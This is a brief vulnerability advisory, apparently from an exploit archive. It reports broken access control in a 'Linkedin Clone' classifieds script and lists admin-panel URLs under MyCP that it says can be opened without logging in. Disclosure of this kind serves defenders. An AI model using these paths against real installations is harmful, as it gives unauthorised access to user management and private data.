Home / os / winmobile

9 Network Linkedin Clone Insecure Direct Object Reference

Posted on 17 January 2017

# # # # # # Vulnerability: Improper Access Restrictions # Date: 15.01.2017 # Vendor Homepage: http://theninehertz.com # Script Name: 9 network Linkedin Clone a Classified Ads Script # Script Version: v1.0 # Script Buy Now: http://theninehertz.com/linkedin-clone # Author: Adeghsan Aencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # Direct entrance.. # An attacker can exploit this issue via a browser. # The following example URIs are available: # http://localhost/[PATH]/MyCP/welcome.php # http://localhost/[PATH]/MyCP/industry-list.php # http://localhost/[PATH]/MyCP/active_user.php # http://localhost/[PATH]/MyCP/deactive_user.php # http://localhost/[PATH]/MyCP/unverified_user.php # http://localhost/[PATH]/MyCP/job-list.php # http://localhost/[PATH]/MyCP/job-pack.php # Vs....... # # # # #

 

TOP